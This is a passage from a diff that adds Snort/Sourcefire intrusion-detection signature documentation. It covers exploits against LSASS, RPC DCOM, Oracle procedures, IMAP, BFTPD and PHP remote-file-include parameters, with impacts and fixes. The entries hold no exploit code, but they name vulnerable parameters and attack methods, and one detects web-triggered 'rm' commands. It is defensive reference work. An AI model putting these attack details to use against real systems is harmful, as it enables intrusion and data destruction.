+For Cisco IOS 11.1, 11.2, 11.3 it is recommended that the TFTP service be disabled.  Cisco does not plan on releasing a patch for this problem.
+
+It may also be possible to mitigate this problem by creating an alias for all filenames being served via the TFTP service.  
+
+Example:
+tftp-server flash rsp-jv-mz.111-24a alias CiscoIOS 
+
+AFTP:
+    Debian Upgrade atftp_0.6.0woody1_alpha.deb
+    http://security.debian.org/pool/updates/main/a/atftp/atftp_0.6.0woody1_alpha.deb
+
+    Debian GNU/Linux 3.0 alias woody.
+
+    Debian Upgrade atftpd_0.6.0woody1_alpha.deb
+    http://security.debian.org/pool/updates/main/a/atftp/atftpd_0.6.0woody1_alpha.deb
+
+    Debian GNU/Linux 3.0 alias woody.
+
+    Debian Upgrade atftp_0.6.0woody1_arm.deb
+    http://security.debian.org/pool/updates/main/a/atftp/atftp_0.6.0woody1_arm.deb
+
+    Debian GNU/Linux 3.0 alias woody.
+
+    Debian Upgrade atftpd_0.6.0woody1_arm.deb
+    http://security.debian.org/pool/updates/main/a/atftp/atftpd_0.6.0woody1_arm.deb
+
+    Debian GNU/Linux 3.0 alias woody.
+
+    Debian Upgrade atftp_0.6.0woody1_i386.deb
+    http://security.debian.org/pool/updates/main/a/atftp/atftp_0.6.0woody1_i386.deb
+
+    Debian GNU/Linux 3.0 alias woody.
+
+    Debian Upgrade atftpd_0.6.0woody1_i386.deb
+    http://security.debian.org/pool/updates/main/a/atftp/atftpd_0.6.0woody1_i386.deb
+
+    Debian GNU/Linux 3.0 alias woody.
+
+    Debian Upgrade atftp_0.6.0woody1_ia64.deb
+    http://security.debian.org/pool/updates/main/a/atftp/atftp_0.6.0woody1_ia64.deb
+
+    Debian GNU/Linux 3.0 alias woody.
+
+    Debian Upgrade atftpd_0.6.0woody1_ia64.deb
+    http://security.debian.org/pool/updates/main/a/atftp/atftpd_0.6.0woody1_ia64.deb
+
+    Debian GNU/Linux 3.0 alias woody.
+
+    Debian Upgrade atftp_0.6.0woody1_hppa.deb
+    http://security.debian.org/pool/updates/main/a/atftp/atftp_0.6.0woody1_hppa.deb
+
+    Debian GNU/Linux 3.0 alias woody.
+
+    Debian Upgrade atftpd_0.6.0woody1_hppa.deb
+    http://security.debian.org/pool/updates/main/a/atftp/atftpd_0.6.0woody1_hppa.deb
+
+    Debian GNU/Linux 3.0 alias woody.
+
+    Debian Upgrade atftp_0.6.0woody1_m68k.deb
+    http://security.debian.org/pool/updates/main/a/atftp/atftp_0.6.0woody1_m68k.deb
+
+    Debian GNU/Linux 3.0 alias woody.
+
+    Debian Upgrade atftpd_0.6.0woody1_m68k.deb
+    http://security.debian.org/pool/updates/main/a/atftp/atftpd_0.6.0woody1_m68k.deb
+
+    Debian GNU/Linux 3.0 alias woody.
+
+    Debian Upgrade atftp_0.6.0woody1_mips.deb
+    http://security.debian.org/pool/updates/main/a/atftp/atftp_0.6.0woody1_mips.deb
+
+    Debian GNU/Linux 3.0 alias woody.
+
+    Debian Upgrade atftpd_0.6.0woody1_mips.deb
+    http://security.debian.org/pool/updates/main/a/atftp/atftpd_0.6.0woody1_mips.deb
+
+    Debian GNU/Linux 3.0 alias woody.
+
+    Debian Upgrade atftp_0.6.0woody1_mipsel.deb
+    http://security.debian.org/pool/updates/main/a/atftp/atftp_0.6.0woody1_mipsel.deb
+
+    Debian GNU/Linux 3.0 alias woody.
+
+    Debian Upgrade atftpd_0.6.0woody1_mipsel.deb
+    http://security.debian.org/pool/updates/main/a/atftp/atftpd_0.6.0woody1_mipsel.deb
+
+    Debian GNU/Linux 3.0 alias woody.
+
+    Debian Upgrade atftp_0.6.0woody1_powerpc.deb
+    http://security.debian.org/pool/updates/main/a/atftp/atftp_0.6.0woody1_powerpc.deb
+
+    Debian GNU/Linux 3.0 alias woody.
+
+    Debian Upgrade atftpd_0.6.0woody1_powerpc.deb
+    http://security.debian.org/pool/updates/main/a/atftp/atftpd_0.6.0woody1_powerpc.deb
+
+    Debian GNU/Linux 3.0 alias woody.
+
+    Debian Upgrade atftp_0.6.0woody1_s390.deb
+    http://security.debian.org/pool/updates/main/a/atftp/atftp_0.6.0woody1_s390.deb
+
+    Debian GNU/Linux 3.0 alias woody.
+
+    Debian Upgrade atftpd_0.6.0woody1_s390.deb
+    http://security.debian.org/pool/updates/main/a/atftp/atftpd_0.6.0woody1_s390.deb
+
+    Debian GNU/Linux 3.0 alias woody.
+
+    Debian Upgrade atftp_0.6.0woody1_sparc.deb
+    http://security.debian.org/pool/updates/main/a/atftp/atftp_0.6.0woody1_sparc.deb
+
+    Debian GNU/Linux 3.0 alias woody.
+
+    Debian Upgrade atftpd_0.6.0woody1_sparc.deb
+    http://security.debian.org/pool/updates/main/a/atftp/atftpd_0.6.0woody1_sparc.deb
+
+    Debian GNU/Linux 3.0 alias woody.
+
+--
+Contributors
+Original rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski matt.watchinski@sourcefire.com
+
+--
+Reference: 
+
+Bugtraq:
+http://www.securityfocus.com/bid/5328
+
+CVE:
+CAN-2002-0813
+
+
+
+--
--- /dev/null
+++ b/doc/signatures/2470.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+2470
+
+--
+Summary:
+This event is generated when an attempt is made to access the C$ default
+administrative share of a Windows host.
+
+--
+Impact:
+Serious. Possible administrator access to the host. Information 
+disclosure.
+
+--
+Detailed Information:
+By default, Windows hosts have default administrative shares of the 
+local hard drives using the format %DRIVE_LETTER% + $. Anybody with 
+administrative rights can remotely access the share.
+
+--
+Affected Systems:
+	Windows hosts.
+
+--
+Attack Scenarios:
+An attacker may be attempting to access files located on the C drive of 
+the host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow Netbios access from external networks (tcp port 139).
+
+--
+Contributors:
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Josh Sakofsky
+
+-- 
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS339
+
+Microsoft:
+http://support.microsoft.com/default.aspx?scid=kb;en-us;100517
+
+--
--- /dev/null
+++ b/doc/signatures/1365.txt
@@ -0,0 +1,47 @@
+Rule:
+
+--
+Sid:
+1365
+
+--
+Summary:
+Attempted rm command access via web
+
+--
+Impact:
+Attempt to delete files on a webserver.
+
+--
+Detailed Information:
+This is an attempt to remove on a machine. Using this command an attacker may delete files on a machine.
+
+--
+Attack Scenarios:
+The attacker can make a standard HTTP request that contains 'rm' in the URI which can then delete files present on the host.  This command may also be requested on a command line should the attacker gain access to the machine.
+
+--
+Ease of Attack:
+Simple HTTP request.
+
+--
+False Positives:
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Webservers should not be allowed to view or execute files and binaries outside of it's designated web root or cgi-bin.  Whenever possible, sensitive files and certain areas of the filesystem should have the system immutable flag set to negate the use of the rm command. On BSD derived systems, setting the systems runtime securelevel also prevents the securelevel from being changed. (note: the securelevel can only be increased)
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2508.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+2508
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer
+overrun condition in Microsoft products via the Local Security Authority
+Subsystem Service (LSASS).
+
+--
+Impact:
+Remote execution of arbitrary code.
+
+--
+Detailed Information:
+A vulnerability exists in LSASS that may present an attacker with the
+opportunity to execute code of their choosing on an affected host.
+
+The problem lies in an unchecked buffer in the LSASS service, suscessful
+exploitation may present the attacker with the opportunity to gain
+control of the affected system.
+
+--
+Affected Systems:
+	Microsoft Windows 2000, 2003 and XP systems.
+
+--
+Attack Scenarios:
+An attcker needs to make a specially crafted request to the LSASS
+service that could contain harmful code to gain further access to the
+system.
+
+--
+Ease of Attack:
+Moderate.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Use a packet filtering firewall to deny access to TCP and UDP ports 135
+and 445, UDP ports 137 and 138 and TCP ports 139 and 593 from resources
+outside the protected network.
+
+Access should also be denied to ephemeral ports and any other ports used
+by RPC services from sources external to the protected network.
+
+--
+Contributors:
+Sourcefire Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1308.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1308
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1614.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1614
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2819.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2819
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure drop_column_group_from_flavor
+. This procedure is included in
+sys.dbms_repcat_fla_mas.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/602.txt
@@ -0,0 +1,57 @@
+Rule: 
+
+--
+Sid: 602
+
+--
+Summary: 
+This event is generated when an attempt to login using the "bin" account is made.
+
+--
+Impact: 
+An attacker may have gained the ability to initiate a remote interactive session on the server.
+
+--
+Detailed Information: 
+This event is generated when a connection using the "bin" account via  "rsh" is attempted. 
+
+This activity is indicative of attempts to abuse hosts using a default configuration. 
+
+Some UNIX systems used to ship with "bin" account enabled and no password required. Similarly, the "rshd" service was also enabled. This allowed an attacker to connect to the machine and establish an interactive session using the "bin" account.
+
+--
+Attack Scenarios: 
+An attacker finds a machine with default account "bin" and "rshd" service running and connects to it, then escalates his privileges to "root"
+
+--
+Ease of Attack: 
+Simple, no exploit software required
+
+--
+False Positives: 
+None Known
+
+--
+False Negatives: 
+If a local username is not the same as the remote one ("bin"), the rule will not generate an event.
+
+--
+Corrective Action: 
+Investigate logs on the target host for further details and more signs of suspicious activity
+
+Use ssh for remote access instead of rlogin.
+
+--
+Contributors: 
+Original rule by Max Vision <vision@whitehats.com> modified from a signature written by Ron Gula
+Snort documentation contributed by Anton Chuvakin <http://www.chuvakin.org>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+http://www.whitehats.com/info/IDS384
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-0651
+
+--
--- /dev/null
+++ b/doc/signatures/2351.txt
@@ -0,0 +1,87 @@
+Rule:
+
+--
+Sid:
+2351
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+This vulnerability is also exploited by the Billy/Blaster worm. The worm
+also uses the Trivial File Transfer Protocol (TFTP) to propagate. A 
+number of events generated by this rule may indicate worm activity.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists. This is also exploited by a worm.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+Block access to port 69 used by the worm to propogate.
+
+Block access to port 4444 used by the worm.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Microsoft:
+http://www.microsoft.com/technet/security/bulletin/MS03-026.asp
+
+CVE:
+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0352
+
+Symantec:
+http://securityresponse.symantec.com/avcenter/venc/data/w32.blaster.worm.html
+
+--
--- /dev/null
+++ b/doc/signatures/100000442.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000442
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "MiraksGalerie" application running on a webserver. Access to the file "pcltar.lib.php" using a remote file being passed as the "g_pcltar_lib_dir" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "g_pcltar_lib_dir" parameter in the "pcltar.lib.php" script used by the "MiraksGalerie" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using MiraksGalerie
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/654.txt
@@ -0,0 +1,64 @@
+Rule:  
+--
+Sid:
+654
+
+--
+Summary:
+When connecting to port 25 (SMTP) on a computer running a vunarable SMTP server it is possible to perform a DoS attack. In some cases it might be possible to perform a security breach as well.
+
+--
+Impact:
+Depending on the vunerable software you may need to restart the SMTP server or perform some level of incident response.
+
+--
+Detailed Information:
+Vulnerable systems:
+	Avirt Mail 4.0 (build 4124)
+	Avirt Mail 4.2 (build 4807)
+	PakMail SMTP/POP3
+	Netscape Messaging Server 3.54/3.55/3.6
+
+More details can be found on the various sites listed below as the impact and details vary from system to system.
+
+--
+Affected Systems:
+ 
+--
+Attack Scenarios:
+Supply a large amount of data after the RCPT TO: header in your SMTP flow.
+
+--
+Ease of Attack:
+DoS: rather easy
+Security breach: probably hard
+
+--
+False Positives:
+These will occur rather frequently with the given rule. They are most common when subscribed to mailinglists.
+
+--
+False Negatives:
+None Known
+
+
+--
+Corrective Action:
+Upgrade software according to the instructions of your software manufacturer.
+
+--
+Contributors:
+Original rule writer unknown
+Original document author unkown
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Hugo van der Kooij <hugo@vanderkooij.org>
+Josh Gray	Edits
+
+-- 
+Additional References:
+http://www.securiteam.com/exploits/6C00O1F00Y.html
+http://www.synnergy.net/downloads/advisories/SLA-2000-01.pakmail.txt
+http://online.securityfocus.com/bid/748
+
+--
--- /dev/null
+++ b/doc/signatures/2857.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2857
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure switch_snapshot_master
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2884.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2884
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure comment_on_update_resolution
+. This procedure is included in
+sys.dbms_repcat_conf.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3158.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3158
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000644.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000644
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "user_add.php" using a remote file being passed as the 
+"admin_template_path" parameter may indicate that an exploitation attempt has 
+been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the "user_add.php" 
+script used by the "Indexu" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/2118.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+2118
+
+--
+Summary:
+This event is generated when a remote user uses invalid data within an
+IMAP LIST command sent to port 143 on an internal server. This may
+indicate an attempt to exploit a buffer overflow vulnerability in the
+IMAP LIST command. This may also affect other IMAP implementations.
+
+Impact:
+Possible shell access on the IMAP server, leading to arbitrary code
+execution. The attacker must have a valid IMAP account on the mail
+server to attempt this exploit.
+
+--
+Detailed Information:
+When a large amount of data is sent to a vulnerable IMAP server in the
+LIST command, a buffer overflow condition may occur. This can allow the
+attacker to access the shell, where arbitrary code can be executed. Note
+that this exploit can only be attempted by a user with a valid IMAP account.
+
+--
+Affected Systems:
+	University of Washington imapd versions 10.234 or 12.264. 
+
+--
+Attack Scenarios:
+An attacker with an IMAP account on the server can send a sufficiently
+long LIST command to the IMAP server, creating a buffer overflow
+condition. This can then allow the attacker to gain shell access on the
+compromised server, possibly leading to the execution of arbitrary code.
+
+--
+Ease of Attack:
+Simple. Exploits exist, but the user must have a valid IMAP account on
+the server.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Apply the appropriate patches for your operating system.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Sourcefire Technical Publications Team
+Jen Harvey <jennifer.harvey@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/398.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+
+Sid:
+398
+
+--
+
+Summary:
+This event is generated when An ICMP Host Unreachable for Type of Server datagram is detected on the network.  
+
+--
+
+Impact:
+Routers will generate this message when the requested TOS (Type of Service) is not permitted to transverse the network.  This could be an indication of an improperly configured routing device or a improperly configured host on the network.
+
+--
+
+Detailed Information: 
+This rule generates informational events about the network.  Large numbers of these messages on the network could indication routing problems, faulty routing devices, or improperly configured hosts.
+
+--
+
+Attack Scenarios:
+None Known
+
+--
+
+Ease of Attack:
+Numerous tools and scripts can generate these types of ICMP datagrams.
+
+--
+
+False Positives:
+None Known
+
+--
+
+False Negatives:
+None Known
+
+--
+
+Corrective Action:
+This rule detects informational network information, no corrective action is necessary.
+
+--
+
+Contributors:
+Original Rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+
+--
+
+Additional References:
+None
+
+
+--
--- /dev/null
+++ b/doc/signatures/1562.txt
@@ -0,0 +1,59 @@
+Rule:
+
+--
+Sid:
+1562
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer overflow associated with BFTPD version 1.0.13.
+
+--
+Impact:
+Remote root access.  A successful attack can allow the remote execution of arbitrary commands with privileges of root.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a vulnerability associated with the FTP SITE CHOWN command of a BFTPD server 1.0.13. A buffer overflow attack can be executed by sending an overly long argument with the SITE CHOWN command.  This attack requires login access to the vulnerable server via an authenticated or anonymous user.
+
+--
+Affected Systems:
+Hosts running BFTPD version 1.0.13. 
+
+--
+Attack Scenarios:
+An attacker may login to a vulnerable FTP server and supply an overly long file argument with the SITE CHOWN command, causing a buffer overflow and allowing the execution of arbitrary commands as root.
+
+--
+Ease of Attack:
+Simple.  
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Disable the use of the SITE command on the vulnerable server by configuring /etc/bftpd.conf with:
+  ENABLE_SITE=no
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com> 
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-0065
+
+--
--- /dev/null
+++ b/doc/signatures/100000430.txt
@@ -0,0 +1,53 @@
+Rule:
+
+--
+Sid:
+100000430
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "BlueShoes" application running on a webserver. Access to the file "Bs_Faq.class.php" using a remote file being passed as the "APP[path][applications]" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
